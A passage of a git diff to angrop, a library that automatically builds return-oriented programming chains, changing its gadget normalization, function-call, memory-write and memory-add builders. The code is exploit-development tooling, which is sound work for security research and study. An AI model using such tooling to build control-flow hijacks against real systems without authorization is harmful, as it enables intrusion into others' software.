optimize(self): + def optimize(self, processes): """ improve the capability of this builder using other builders """ cls_name = self.__class__.__name__ raise NotImplementedError(f"`advanced_update` is not implemented for {cls_name}!") + + def _normalize_conditional(self, gadget, preserve_regs=None): + if preserve_regs is None: + preserve_regs = set() + + registers = {} + for reg in gadget.branch_dependencies: + var = claripy.BVS(f"bvar_{reg}", self.project.arch.bits) + registers[reg] = var + try: + chain = self.set_regs(preserve_regs=preserve_regs, **registers) + except RopException: + return None + gadgets = chain._gadgets + return gadgets + + def _normalize_jmp_reg(self, gadget, pre_preserve=None, to_set_regs=None): + if pre_preserve is None: + pre_preserve = set() + if to_set_regs is None: + to_set_regs = set() + reg_setter = self.chain_builder._reg_setter + if not reg_setter.can_set_reg(gadget.pc_reg): + return None + if gadget.pc_reg in pre_preserve or gadget.pc_reg in to_set_regs: + return None + + # choose the best gadget to set the PC for this jmp_reg gadget + for pc_setter in reg_setter._reg_setting_dict[gadget.pc_reg]: + if pc_setter.has_symbolic_access(): + continue + if pc_setter.changed_regs.intersection(pre_preserve): + continue + total_sc = gadget.stack_change + pc_setter.stack_change + gadgets = reg_setter._mixins_to_gadgets([pc_setter, gadget]) + try: + chain = reg_setter._build_reg_setting_chain(gadgets, {}) + rb = RopBlock.from_chain(chain) + + # TODO: technically, we should support chains like: + # pop rax; add eax, 0x1000; ret + ; call rax; + # but I'm too lazy to implement it atm + _, final_state = rb.sim_exec() + if final_state.ip.depth > 1: + continue + assert rb.stack_change == total_sc + return rb._gadgets[:-1] + except RopException: + pass + return None + + def _normalize_jmp_mem(self, gadget, pre_preserve=None, post_preserve=None): + if not self.chain_builder._can_do_write: + return None + if pre_preserve is None: + pre_preserve = set() 
+ if post_preserve is None: + post_preserve = set() + + # calculate the number of bytes we need to shift after jmp_mem + # this handles out of patch access + mem_writer = self.chain_builder._mem_writer + stack_offsets = [] + for m in gadget.mem_reads + gadget.mem_writes + gadget.mem_changes: + if m.stack_offset is not None: + stack_offsets.append(m.stack_offset + self.project.arch.bytes) + if stack_offsets: + shift_size = max(stack_offsets) - gadget.stack_change + else: + shift_size = self.project.arch.bytes + + # make sure we can set the pc_target ast in the first place + needed_regs = set(x[5:].split('-', 1)[0] for x in gadget.pc_target.variables if x.startswith('sreg_')) + reg_setter = self.chain_builder._reg_setter + for reg in needed_regs: + if not reg_setter.can_set_reg(reg): + return None + + # if the target is not symbolic, make sure the target location is writable + if not gadget.pc_target.symbolic: + seg = self.project.loader.find_segment_containing(gadget.pc_target.concrete_value) + if not seg or not seg.is_writable: + return None + + try: + # step1: find a shifter that clean up the jmp_mem call + sc = abs(gadget.stack_change) + self.project.arch.bytes + shifter = None + # find the smallest shifter + shift_gadgets = self.chain_builder._shifter.shift_gadgets + keys = sorted(shift_gadgets.keys()) + shifter_list = [shift_gadgets[x] for x in keys if x >= sc] + if not shifter_list: + return None + shifter_list = itertools.chain.from_iterable(shifter_list) + for shifter in shifter_list: + if shifter.pc_offset < shift_size: + continue + if not shifter.changed_regs.intersection(post_preserve): + break + else: + return None + assert shifter.transit_type == 'pop_pc' + + # step2: write the shifter to a writable location + data = struct.pack(self.project.arch.struct_fmt(), shifter.addr) + if gadget.pc_target.symbolic: + ptr = self._get_ptr_to_writable(self.project.arch.bytes) + # we ensure the content it points to is zeroed out, so we don't need to write trailing 0s 
+ # but we can't do so for GOT because they may have leftovers there + data = data.rstrip(b'\x00') + else: + ptr = gadget.pc_target.concrete_value + ptr_val = rop_utils.cast_rop_value(ptr, self.project) + chain = mem_writer.write_to_mem(ptr_val, data, fill_byte=b'\x00', preserve_regs=pre_preserve) + rb = RopBlock.from_chain(chain) + state = rb._blank_state + + # step3: identify the registers that we can't fully control yet in pc_target, then set them using RegSetter + _, final_state = rb.sim_exec() + try: + reg_solves, stack_solves = self._solve_ast_constraint(gadget.pc_target, ptr) + except claripy.errors.UnsatError: # type: ignore + return None + to_set_regs = {x:y for x,y in reg_solves.items() if x not in rb.popped_regs} + preserve_regs = set(reg_solves.keys()) - set(to_set_regs.keys()) + if any(x for x in to_set_regs if not self.chain_builder._reg_setter.can_set_reg(x)): + return None + if preserve_regs: + for reg in preserve_regs: + rb._blank_state.solver.add(final_state.registers.load(reg) == reg_solves[reg]) + if to_set_regs: + chain = self.set_regs(**to_set_regs, preserve_regs=preserve_regs.union(pre_preserve)) + rb += RopBlock.from_chain(chain) + + # step4: chain it with the jmp_mem gadget + # note that rb2 here is actually the gadget+shifter + # but shifter is written into memory, so ignore it when building rb2 + rb2 = RopBlock(self.project, self) + value = RopValue(gadget.addr, self.project) + value.rebase_analysis(chain=chain) + rb2.add_value(value) + + sc = shifter.stack_change + gadget.stack_change + state = rb2._blank_state + for offset in range(0, sc, self.project.arch.bytes): + if offset == shifter.pc_offset + gadget.stack_change: + val = state.solver.BVS("next_pc", self.project.arch.bits) + else: + # FIXME: currently, the endness handling is a mess. 
Need to rewrite this part in a uniformed way + # the following code is a compromise to the mess + arch_bytes = self.project.arch.bytes + idx = (rb.stack_change + offset)//arch_bytes + data = claripy.BVS(f"symbolic_stack_{idx}", self.project.arch.bits) + state.memory.store(state.regs.sp+rb.stack_change+offset, data) + addr = state.regs.sp+rb.stack_change+offset + val = state.memory.load(addr, arch_bytes, endness=self.project.arch.memory_endness) + rb2.add_value(val) + rb2.set_gadgets([gadget]) + for offset, val in stack_solves.items(): + # +1 because we insert a gadget before the stack patch + rb2._values[offset+1] = rop_utils.cast_rop_value(val, self.project) + + rb += rb2 + return rb + except (RopException, IndexError): + return None + + def normalize_gadget(self, gadget, pre_preserve=None, post_preserve=None, to_set_regs=None): + """ + pre_preserve: what registers to preserve before executing the gadget + post_preserve: what registers to preserve after executing the gadget + """ + try: + gadgets = [gadget] + + if pre_preserve is None: + pre_preserve = set() + if post_preserve is None: + post_preserve = set() + m = None + + # filter out gadgets with too many symbolic access + if gadget.num_sym_mem_access > 1: + return None + + # TODO: don't support these yet + if gadget.transit_type == 'jmp_mem': + if gadget.has_conditional_branch or gadget.has_symbolic_access(): + return None + + # at this point, we know for sure all gadget symbolic accesses should be normalized + # because they can't be jmp_mem gadgets + if gadget.has_symbolic_access(): + mem_accesses = gadget.mem_reads + gadget.mem_writes + gadget.mem_changes + sim_accesses = [x for x in mem_accesses if x.is_symbolic_access()] + assert len(sim_accesses) == 1, hex(gadget.addr) + m = sim_accesses[0] + pre_preserve = pre_preserve.union(m.addr_controllers) + + # normalize conditional branches + if gadget.has_conditional_branch: + tmp = self._normalize_conditional(gadget, preserve_regs=pre_preserve) + if tmp is 
None: + return None + gadgets = tmp + gadgets + + # normalize transit_types + if gadget.transit_type == 'jmp_reg': + tmp = self._normalize_jmp_reg(gadget, pre_preserve=pre_preserve, to_set_regs=to_set_regs) + if tmp is None: + return None + gadgets = tmp + gadgets + elif gadget.transit_type == 'jmp_mem': + rb = self._normalize_jmp_mem(gadget, pre_preserve=pre_preserve, post_preserve=post_preserve) + return rb + elif gadget.transit_type == 'pop_pc': + pass + else: + raise NotImplementedError() + + chain = self._build_reg_setting_chain(gadgets, {}) + rb = RopBlock.from_chain(chain) + + if rb is None: + return None + + # normalize non-positive stack_change + if gadget.stack_change <= 0: + shift_gadgets = self.chain_builder._shifter.shift_gadgets + sc = abs(gadget.stack_change) + self.project.arch.bytes + keys = sorted(shift_gadgets.keys()) + shifter_list = [shift_gadgets[x] for x in keys if x >= sc] + shifter_list = itertools.chain.from_iterable(shifter_list) + max_stack_offset = gadget.max_stack_offset + for shifter in shifter_list: + if shifter.pc_offset < abs(gadget.stack_change) + max_stack_offset + self.project.arch.bytes: + continue + if shifter.changed_regs.intersection(post_preserve): + continue + try: + chain = self._build_reg_setting_chain([rb, shifter], {}) + rb = RopBlock.from_chain(chain) + break + except RopException: + pass + else: + return None + + if rb is None: + return None + + # handle cases where the ropblock has out_of_patch accesses + # the solution is to shift the stack to contain the accesses + # FIXME: currently, we allow bytes*2 more bytes in shifting because of the mismatch on how + # stack_max_offset is calculated in ropblock and ropgadget + if rb.oop: + shift_gadgets = self.chain_builder._shifter.shift_gadgets + keys = sorted(shift_gadgets.keys()) + shifter_list = itertools.chain.from_iterable([shift_gadgets[k] for k in keys]) + for shifter in shifter_list: + if shifter.stack_change + rb.stack_change <= rb.max_stack_offset: + continue + 
if shifter.pc_offset == rb.max_stack_offset - rb.stack_change: + continue + try: + chain = self._build_reg_setting_chain([rb, shifter], {}) + rb = RopBlock.from_chain(chain) + rb._values = rb._values[:rb.stack_change//self.project.arch.bytes+1] + rb.payload_len = len(rb._values) * self.project.arch.bytes + break + except RopException: + pass + else: + return None + + # constrain memory accesses + if m is not None: + request = {} + for reg in m.addr_controllers: + data = claripy.BVS('sym_addr', self.project.arch.bits) + request[reg] = data + if request: + tmp = self.set_regs(**request) + tmp = RopBlock.from_chain(tmp) + _, final_state = tmp.sim_exec() + st = rb._blank_state + for reg in m.addr_controllers: + tmp._blank_state.solver.add(final_state.registers.load(reg) == st.registers.load(reg)) + rb = tmp + rb + else: # TODO:we currently don't support symbolizing address popped from stack + return None + return rb + + return rb + except (RopException, angr.errors.SimSolverModeError): + return None diff --git a/angrop/chain_builder/func_caller.py b/angrop/chain_builder/func_caller.py index 1874197a..aeadf47b 100644 --- a/angrop/chain_builder/func_caller.py +++ b/angrop/chain_builder/func_caller.py @@ -1,3 +1,4 @@ +import struct import logging import angr @@ -28,7 +29,7 @@ def __init__(self, chain_builder): self._cc = angr.default_cc( self.project.arch.name, platform=self.project.simos.name if self.project.simos is not None else None, - )(self.project.arch) + )(self.project.arch) # type:ignore def bootstrap(self): cc = self._cc @@ -44,33 +45,6 @@ def bootstrap(self): self._func_jmp_gadgets.add(g) break - def _is_valid_pointer(self, addr): - """ - Validate if an address is a legitimate pointer in the binary - Checks: - 1. Address is within memory ranges - 2. Address points to readable memory - 3. 
Address is aligned - """ - arch_bytes = self.project.arch.bytes - - # Check basic alignment - if addr % arch_bytes != 0: - return False - - # Check against memory ranges - if (addr < self.project.loader.min_addr or - addr >= self.project.loader.max_addr): - return False - - # Check readable writable sections - for section in self.project.loader.main_object.sections: - if (section.is_readable and - section.min_addr <= addr < section.max_addr): - return True - - return False - def _find_function_pointer_in_got_plt(self, func_addr): """ Search if a func addr is in plt. If it's in plt, find func name and @@ -105,23 +79,20 @@ def _find_function_pointer(self, func_addr): return got_ptr # Broader search strategy - for obj in self.project.loader.all_objects: - for section in obj.sections: - if not section.is_readable: - continue - - # Scan section for potential pointers - for offset in range(0, section.max_addr - section.min_addr, self.project.arch.bytes): - potential_ptr = section.min_addr + offset - try: - ptr_value = self.project.loader.memory.unpack_word(potential_ptr) - if (ptr_value == func_addr and - self._is_valid_pointer(potential_ptr)): - return potential_ptr - except Exception: # pylint: disable=broad-exception-caught - continue + func_ptr_bytes = struct.pack(self.project.arch.struct_fmt(), func_addr) + for seg in self.project.loader.main_object.segments: + if not seg.is_readable: + continue + if not seg.memsize: + continue - raise RopException("Could not find mem pointing to func in binary memory") + # Scan segments for potential pointers + sec_data = self.project.loader.memory.load(seg.min_addr, seg.memsize) + offset = sec_data.find(func_ptr_bytes) + if offset == -1: + continue + return seg.min_addr + offset + return None def _func_call(self, func_gadget, cc, args, extra_regs=None, preserve_regs=None, needs_return=True, jmp_mem_target=None, **kwargs): @@ -252,29 +223,41 @@ def func_call(self, address, args, **kwargs): registers = 
{self._cc.ARG_REGS[i]:register_args[i] for i in range(len(register_args))} reg_names = set(registers.keys()) ptr_to_func = self._find_function_pointer(address) - for g in self._func_jmp_gadgets: - if g.popped_regs.intersection(reg_names): - raise NotImplementedError("do not support func_jmp_gadgets that have pops") + hard_regs = [x for x in registers if not self.chain_builder._reg_setter.can_set_reg(x)] + if ptr_to_func is not None: + for g in self._func_jmp_gadgets: # type:ignore + if g.popped_regs.intersection(reg_names): + l.warning("do not support func_jmp_gadgets that have pops: %s", g.dstr()) + continue - # build the new target registers - registers = registers.copy() - for move in g.reg_moves: - if move.to_reg in registers.keys(): - val = registers[move.to_reg] - assert move.from_reg not in registers, "oops, overlapped moves not handled atm" - del registers[move.to_reg] - registers[move.from_reg] = val + # build the new target registers + registers = registers.copy() + skip = False + for move in g.reg_moves: + if move.from_reg in hard_regs or move.to_reg not in hard_regs: + skip = True + break + if move.to_reg in registers.keys(): + val = registers[move.to_reg] + if move.from_reg in registers: + l.warning("oops, overlapped moves not handled atm: %s", g.dstr()) + skip = True + break + del registers[move.to_reg] + registers[move.from_reg] = val + if skip: + continue - if g.transit_type != 'jmp_mem': - raise NotImplementedError("currently only support jmp_mem type func_jmp_gadgets!") - #func_gadget.stack_change = self.project.arch.bytes - #func_gadget.pc_offset = 0 - # try to invoke the function using the new target registers - try: - return self._func_call(g, self._cc, [], extra_regs=registers, - jmp_mem_target=ptr_to_func, **kwargs) - except RopException: - pass + if g.transit_type != 'jmp_mem': + raise NotImplementedError("currently only support jmp_mem type func_jmp_gadgets!") + #func_gadget.stack_change = self.project.arch.bytes + #func_gadget.pc_offset = 
0 + # try to invoke the function using the new target registers + try: + return self._func_call(g, self._cc, [], extra_regs=registers, + jmp_mem_target=ptr_to_func, **kwargs) + except RopException: + pass s = symbol if symbol else hex(address) raise RopException(f"fail to invoke function: {s}") diff --git a/angrop/chain_builder/mem_changer.py b/angrop/chain_builder/mem_changer.py index 0203c081..921b2b39 100644 --- a/angrop/chain_builder/mem_changer.py +++ b/angrop/chain_builder/mem_changer.py @@ -6,6 +6,8 @@ from .builder import Builder from .. import rop_utils +from ..rop_block import RopBlock +from ..rop_gadget import RopGadget from ..errors import RopException l = logging.getLogger(__name__) @@ -16,8 +18,8 @@ class MemChanger(Builder): """ def __init__(self, chain_builder): super().__init__(chain_builder) - self._mem_change_gadgets = None - self._mem_add_gadgets = None + self._mem_change_gadgets: list[RopGadget] = None # type: ignore + self._mem_add_gadgets: list[RopGadget] = None # type: ignore def bootstrap(self): self._mem_change_gadgets = self._get_all_mem_change_gadgets(self.chain_builder.gadgets) @@ -40,39 +42,25 @@ def verify(self, chain, addr, value, _): if not set(state.regs.pc.variables).pop().startswith("next_pc_"): raise RopException("memory add fails - 3") - def _set_regs(self, *args, **kwargs): - return self.chain_builder._reg_setter.run(*args, **kwargs) - - def _same_effect(self, g1, g2): - change1 = g1.mem_changes[0] - change2 = g2.mem_changes[0] - - if change1.op != change2.op: - return False - if change1.data_size != change2.data_size: - return False - if change1.data_constant != change2.data_constant: - return False - if change1.addr_dependencies != change2.addr_dependencies: - return False - if change1.data_dependencies != change2.data_dependencies: - return False - return True - - def _better_than(self, g1, g2): - if g1.isn_count <= g2.isn_count and \ - g1.stack_change <= g2.stack_change and \ - len(g1.changed_regs) <= len(g2.changed_regs) 
and \ - g1.num_sym_mem_access <= g2.num_sym_mem_access: - return True - return False + def _effect_tuple(self, g): + change = g.mem_changes[0] + v1 = change.op + v2 = change.data_size + v3 = change.data_constant + v4 = tuple(sorted(change.addr_dependencies)) + v5 = tuple(sorted(change.data_dependencies)) + return (v1, v2, v3, v4, v5) + + def _comparison_tuple(self, g): + return (len(g.changed_regs), g.stack_change, g.num_sym_mem_access, + rop_utils.transit_num(g), g.isn_count) def _get_all_mem_change_gadgets(self, gadgets): possible_gadgets = set() for g in gadgets: if not g.self_contained: continue - sym_rw = set(m for m in g.mem_reads + g.mem_writes if m.is_symbolic_access()) + sym_rw = [m for m in g.mem_reads + g.mem_writes if m.is_symbolic_access()] if len(sym_rw) > 0 or len(g.mem_changes) != 1: continue for m_access in g.mem_changes: @@ -116,24 +104,8 @@ def add_to_mem(self, addr, value, data_size=None): if not possible_gadgets: raise RopException("Fail to find any gadget that can perform memory adding...") - # get the data from trying to set all the registers - registers = dict((reg, 0x41) for reg in self.chain_builder.arch.reg_set) - l.debug("getting reg data for mem adds") - _, _, reg_data = self.chain_builder._reg_setter.find_candidate_chains_graph_search(max_stack_change=0x50, - **registers) - l.debug("trying mem_add gadgets") - - # filter out gadgets that certainly cannot be used for add_mem - # e.g. 
we can't set needed registers - gadgets = set() - for t, _ in reg_data.items(): - for g in possible_gadgets: - mem_change = g.mem_changes[0] - if (set(mem_change.addr_dependencies) | set(mem_change.data_dependencies)).issubset(set(t)): - gadgets.add(g) - # sort the gadgets with number of memory accesses and stack_change - gadgets = self._sort_gadgets(gadgets) + gadgets = self._sort_gadgets(possible_gadgets) if not gadgets: raise RopException("Couldnt set registers for any memory add gadget") @@ -163,7 +135,8 @@ def _add_mem_with_gadget(self, gadget, addr, data_size, final_val=None, differen # constrain the successor to be at the gadget # emulate 'pop pc' - test_state = self.make_sim_state(gadget.addr) + arch_bytes = self.project.arch.bytes + test_state = self.make_sim_state(gadget.addr, gadget.stack_change//arch_bytes) if difference is not None: test_state.memory.store(addr.concreted, claripy.BVV(~(difference.concreted), data_size)) # pylint:disable=invalid-unary-operand-type @@ -209,13 +182,7 @@ def _add_mem_with_gadget(self, gadget, addr, data_size, final_val=None, differen for reg in set(all_deps): reg_vals[reg] = test_state.solver.eval(test_state.registers.load(reg)) - chain = self._set_regs(**reg_vals) - chain.add_gadget(gadget) - - bytes_per_pop = self.project.arch.bytes - for offset in range(0, gadget.stack_change, bytes_per_pop): - if offset == gadget.pc_offset: - chain.add_value(claripy.BVS("next_pc", self.project.arch.bits)) - else: - chain.add_value(self._get_fill_val()) + chain = self.set_regs(**reg_vals) + chain = RopBlock.from_chain(chain) + chain = self._build_reg_setting_chain([chain, gadget], {}) return chain diff --git a/angrop/chain_builder/mem_writer.py b/angrop/chain_builder/mem_writer.py index 9d396fe6..7fefc5ba 100644 --- a/angrop/chain_builder/mem_writer.py +++ b/angrop/chain_builder/mem_writer.py @@ -1,4 +1,6 @@ +import struct import logging +from collections import defaultdict import angr import claripy @@ -8,8 +10,132 @@ from ..errors 
import RopException from ..rop_chain import RopChain from ..rop_value import RopValue +from ..rop_block import RopBlock +from ..rop_gadget import RopGadget -l = logging.getLogger("angrop.chain_builder.mem_writer") +l = logging.getLogger(__name__) + +class MemWriteChain: + """ + cached memory writing chain, we only need to concretize the variables in the chain to + generate a new chain + """ + def __init__(self, builder, gadget, preserve_regs): + self.project = builder.project + self.builder = builder + self.gadget = gadget + self.preserve_regs = preserve_regs + mem_write = self.gadget.mem_writes[0] + self.addr_bv = claripy.BVS("addr", mem_write.addr_size) + self.data_bv = claripy.BVS("data", mem_write.data_size) + self.state = builder.make_sim_state(gadget.addr, gadget.stack_change//self.project.arch.bytes+1) + self.chain = self._build_chain() + + def _build_chain(self): + mem_write = self.gadget.mem_writes[0] + + # step through the state once to identify the mem_write action + state = self.state + final_state = rop_utils.step_to_unconstrained_successor(self.project, state) + the_action = None + for a in final_state.history.actions.hardcopy: + if a.type != "mem" or a.action != "write": + continue + if set(rop_utils.get_ast_dependency(a.addr.ast)) == set(mem_write.addr_dependencies) and \ + set(rop_utils.get_ast_dependency(a.data.ast)) == set(mem_write.data_dependencies): + the_action = a + break + else: + raise RopException("Couldn't find the matching action") + + # they both need to contain one single variable + addr_ast = the_action.addr.ast + data_ast = the_action.data.ast + assert len(addr_ast.variables) == 1 and len(data_ast.variables) == 1 + + # check the register values + reg_vals = {} + constrained_addrs = None + for ast, bv, t in [(addr_ast, self.addr_bv, 'addr'), (data_ast, self.data_bv, 'data')]: + # in case of short write + if bv.size() < ast.size(): + bv = claripy.ZeroExt(ast.size() - bv.size(), bv) + variable = list(ast.variables)[0] + if 
variable.startswith('sreg_'): + reg_vals[variable.split('-', 1)[0][5:]] = self.builder._rebalance_ast(ast, bv, mode='reg')[1] + elif variable.startswith('symbolic_stack_'): + if t == 'addr': + assert constrained_addrs is None + constrained_addrs = [ast] + else: + raise RuntimeError("what variable this is?") + + chain = self.builder.set_regs(**reg_vals, preserve_regs=self.preserve_regs) + chain = RopBlock.from_chain(chain) + chain = self.builder._build_reg_setting_chain([chain, self.gadget], {}, constrained_addrs=constrained_addrs) + + if not constrained_addrs: + return chain + addr_ast = constrained_addrs[0] + addr_ast_vars = addr_ast.variables + for _, val in enumerate(chain._values): + if not val.symbolic: + continue + if not addr_ast_vars.intersection(val.ast.variables): + continue + ast = self.builder._rebalance_ast(addr_ast, self.addr_bv)[1] + # FIXME: again endness issue + if ast.op == 'Reverse': + ast = ast.args[0] + val._value = ast + break + return chain + + def concretize(self, addr_val, data): + chain = self.chain.copy() + fmt = self.project.arch.struct_fmt() + arch_bytes = self.project.arch.bytes + arch_bits = self.project.arch.bits + # replace addr and data + for idx, val in enumerate(chain._values): + if not val.symbolic or not val.ast.variables: + continue + if list(val.ast.variables)[0].startswith('addr_'): + test_ast = claripy.algorithm.replace(expr=val.ast, + old=self.addr_bv, + new=addr_val.data) + new = addr_val.copy() + new._value = test_ast + if addr_val._rebase: + new.rebase_ptr() + chain._values[idx] = new + continue + if list(val.ast.variables)[0].startswith('data_'): + var = claripy.BVV(struct.unpack(fmt, data.ljust(arch_bytes, b'\x00'))[0], len(self.data_bv)) + test_ast = claripy.algorithm.replace(expr=val.ast, + old=self.data_bv, + new=var) + if len(test_ast) < arch_bits: # type: ignore + test_ast = claripy.ZeroExt(arch_bits-len(test_ast), test_ast) # type: ignore + # since this is data, we assume it should not be rebased + val = 
RopValue(test_ast, self.project) + val._rebase = False + chain._values[idx] = val + continue + if list(val.ast.variables)[0].startswith('symbolic_stack_'): + # FIXME: my lazy implementation, the endness mess really needs to be rewritten + tmp = claripy.BVS(f"symbolic_stack_{idx}", arch_bits) + if self.project.arch.memory_endness == 'Iend_LE': + tmp = claripy.Reverse(tmp) + chain._values[idx] = RopValue(tmp, self.project) + return chain + + @property + def changed_regs(self): + s = set() + for g in self.chain._gadgets: + s |= g.changed_regs + return s class MemWriter(Builder): """ @@ -18,33 +144,35 @@ class MemWriter(Builder): """ def __init__(self, chain_builder): super().__init__(chain_builder) - self._mem_write_gadgets: set = None # type: ignore - self._good_mem_write_gadgets: set = None # type: ignore + self._mem_write_gadgets: set[RopGadget] = None # type: ignore + self._good_mem_write_gadgets: dict = None # type: ignore + self._mem_write_chain_cache = defaultdict(list) def bootstrap(self): self._mem_write_gadgets = self._get_all_mem_write_gadgets(self.chain_builder.gadgets) - self._good_mem_write_gadgets = set() - - def _set_regs(self, *args, **kwargs): - return self.chain_builder._reg_setter.run(*args, **kwargs) + self._good_mem_write_gadgets = defaultdict(set) @staticmethod def _get_all_mem_write_gadgets(gadgets): + """ + we consider a gadget mem_write gadget if + 1. it is self-contained + 2. there is only one symbolic memory access and it is a memory write + 3. 
addr/data are independent + """ possible_gadgets = set() for g in gadgets: if not g.self_contained: continue - sym_rw = set(m for m in g.mem_reads + g.mem_changes if m.is_symbolic_access()) + sym_rw = [m for m in g.mem_reads + g.mem_changes if m.is_symbolic_access()] if len(sym_rw) > 0 or len(g.mem_writes) != 1: continue - if g.stack_change <= 0: - continue for m_access in g.mem_writes: if m_access.addr_controllable() and m_access.data_controllable() and m_access.addr_data_independent(): possible_gadgets.add(g) return possible_gadgets - def _better_than(self, g1, g2): + def _better_than(self, g1, g2): # pylint: disable=no-self-use if g1.stack_change > g2.stack_change: return False if g1.num_sym_mem_access > g2.num_sym_mem_access: @@ -53,51 +181,54 @@ def _better_than(self, g1, g2): return False if not g1.changed_regs.issubset(g2.changed_regs): return False + if rop_utils.transit_num(g1) > rop_utils.transit_num(g2): + return False return True - def _gen_mem_write_gadgets(self, string_data): + def _gen_mem_write_gadgets(self, string_data, cache_key): # create a dict of bytes per write to gadgets # assume we need intersection of addr_dependencies and data_dependencies to be 0 # TODO could allow mem_reads as long as we control the address? 
# generate from the cache first - if self._good_mem_write_gadgets: - yield from self._good_mem_write_gadgets + if self._good_mem_write_gadgets[cache_key]: + yield from self._good_mem_write_gadgets[cache_key] - possible_gadgets = {g for g in self._mem_write_gadgets.copy() if g.transit_type != 'jmp_reg'} - possible_gadgets -= self._good_mem_write_gadgets # already yield these + # now look for gadgets that require least stack change + possible_gadgets = {g for g in self._mem_write_gadgets if g.self_contained} + possible_gadgets -= self._good_mem_write_gadgets[cache_key] # already yield these - # use the graph-search to gain a rough idea about (stack_change, register setting) - registers = dict((reg, 0x41) for reg in self.arch.reg_set) - l.debug("getting reg data for mem writes") reg_setter = self.chain_builder._reg_setter - _, _, reg_data = reg_setter.find_candidate_chains_graph_search(max_stack_change=0x50, **registers) - l.debug("trying mem_write gadgets") - - # find a write gadget that induces the smallest stack_change + can_set_regs = {x for x in reg_setter._reg_setting_dict if reg_setter._reg_setting_dict[x]} while possible_gadgets: + to_remove = set() # limit the maximum size of the chain best_stack_change = 0x400 best_gadget = None - # regs: according to the graph search, what registers can be controlled - # vals[1]: stack_change to set those registers - for regs, vals in reg_data.items(): - reg_set_stack_change = vals[1] - if reg_set_stack_change > best_stack_change: + + for g in possible_gadgets: + mem_write = g.mem_writes[0] + dep_regs = mem_write.addr_dependencies | mem_write.data_dependencies + if not dep_regs.issubset(can_set_regs): + to_remove.add(g) continue - for g in possible_gadgets: - mem_write = g.mem_writes[0] - if not (mem_write.addr_dependencies | mem_write.data_dependencies).issubset(regs): - continue - stack_change = g.stack_change + reg_set_stack_change - bytes_per_write = mem_write.data_size // 8 - num_writes = (len(string_data) + 
bytes_per_write - 1)//bytes_per_write - stack_change *= num_writes - if stack_change < best_stack_change: - best_gadget = g - best_stack_change = stack_change - if stack_change == best_stack_change and self._better_than(g, best_gadget): - best_gadget = g + + # estimate the stack_change cost of the gadget + stack_change = g.stack_change + for reg in dep_regs: + stack_change += reg_setter._reg_setting_dict[reg][0].stack_change + bytes_per_write = mem_write.data_size // 8 + num_writes = (len(string_data) + bytes_per_write - 1)//bytes_per_write + stack_change *= num_writes + + if stack_change < best_stack_change: + best_gadget = g + best_stack_change = stack_change + if stack_change == best_stack_change and (best_gadget is None or self._better_than(g, best_gadget)): + best_gadget = g + + if to_remove: + possible_gadgets -= to_remove if best_gadget: possible_gadgets.remove(best_gadget) @@ -106,7 +237,7 @@ def _gen_mem_write_gadgets(self, string_data): break @rop_utils.timeout(5) - def _try_write_to_mem(self, gadget, use_partial_controllers, addr, string_data, fill_byte): + def _try_write_to_mem(self, gadget, addr, string_data, preserve_regs, fill_byte): gadget_code = str(self.project.factory.block(gadget.addr).capstone) l.debug("building mem_write chain with gadget:\n%s", gadget_code) mem_write = gadget.mem_writes[0] @@ -115,101 +246,88 @@ def _try_write_to_mem(self, gadget, use_partial_controllers, addr, string_data, # there should be only two cases. 
Either it is a string, or it is a single badbyte chain = RopChain(self.project, self, badbytes=self.badbytes) if len(string_data) == 1 and ord(string_data) in self.badbytes: - chain += self._write_to_mem_with_gadget(gadget, addr, string_data, use_partial_controllers) + chain += self._write_to_mem_with_gadget_with_cache(gadget, addr, string_data, preserve_regs) else: - bytes_per_write = mem_write.data_size//8 if not use_partial_controllers else 1 + bytes_per_write = mem_write.data_size//8 for i in range(0, len(string_data), bytes_per_write): to_write = string_data[i: i+bytes_per_write] # pad if needed if len(to_write) < bytes_per_write and fill_byte: to_write += fill_byte * (bytes_per_write-len(to_write)) - chain += self._write_to_mem_with_gadget(gadget, addr + i, to_write, use_partial_controllers) + chain += self._write_to_mem_with_gadget_with_cache(gadget, addr + i, to_write, preserve_regs) return chain - def _write_to_mem(self, addr, string_data, fill_byte=b"\xff"):# pylint:disable=inconsistent-return-statements + def _write_to_mem(self, addr, string_data, preserve_regs=None, fill_byte=b"\xff"):# pylint:disable=inconsistent-return-statements """ :param addr: address to store the string :param string_data: string to store :param fill_byte: a byte to use to fill up the string if necessary :return: a rop chain """ - for gadget in self._gen_mem_write_gadgets(string_data): + if preserve_regs is None: + preserve_regs = set() + + key = (len(string_data), tuple(sorted(preserve_regs))) + for gadget in self._gen_mem_write_gadgets(string_data, key): + # sanity checks, make sure it doesn't clobber any preserved_regs + if gadget.changed_regs.intersection(preserve_regs): + continue + mem_write = gadget.mem_writes[0] + all_deps = mem_write.addr_dependencies | mem_write.data_dependencies + if all_deps.intersection(preserve_regs): + continue + + # actually trying each gadget and cache the good gadgets try: - chain = self._try_write_to_mem(gadget, False, addr, string_data, 
fill_byte) - self._good_mem_write_gadgets.add(gadget) + chain = self._try_write_to_mem(gadget, addr, string_data, preserve_regs, fill_byte) + self._good_mem_write_gadgets[key].add(gadget) return chain except (RopException, angr.errors.SimEngineError, angr.errors.SimUnsatError): pass raise RopException("Fail to write data to memory :(") - def write_to_mem(self, addr, data, fill_byte=b"\xff"): - - # sanity check - if not (isinstance(fill_byte, bytes) and len(fill_byte) == 1): - raise RopException("fill_byte is not a one byte string, aborting") - if not isinstance(data, bytes): - raise RopException("data is not a byte string, aborting") - if ord(fill_byte) in self.badbytes: - raise RopException("fill_byte is a bad byte!") - - # split the string into smaller elements so that we can - # handle bad bytes - if all(x not in self.badbytes for x in data): - elems = [data] - else: - elems = [] - e = b'' - for x in data: - if x not in self.badbytes: - e += bytes([x]) - else: - if e: - elems.append(e) - elems.append(bytes([x])) - e = b'' - if e: - elems.append(e) - - # do the write - offset = 0 - chain = RopChain(self.project, self, badbytes=self.badbytes) - for elem in elems: - ptr = addr + offset - if self._word_contain_badbyte(ptr): - raise RopException(f"{ptr} contains bad byte!") - if len(elem) != 1 or ord(elem) not in self.badbytes: - chain += self._write_to_mem(ptr, elem, fill_byte=fill_byte) - offset += len(elem) - else: - chain += self._write_to_mem(ptr, elem, fill_byte=fill_byte) - offset += 1 - return chain + def _write_to_mem_with_gadget_with_cache(self, gadget, addr_val, data, preserve_regs): + mem_write = gadget.mem_writes[0] + if len(mem_write.addr_dependencies) <= 1 and len(mem_write.data_dependencies) <= 1 and \ + mem_write.data_size in (32, 64): + if not self._mem_write_chain_cache[gadget]: + try: + cache_chain = MemWriteChain(self, gadget, preserve_regs) + self._mem_write_chain_cache[gadget].append(cache_chain) + except RopException: + pass + for cache_chain 
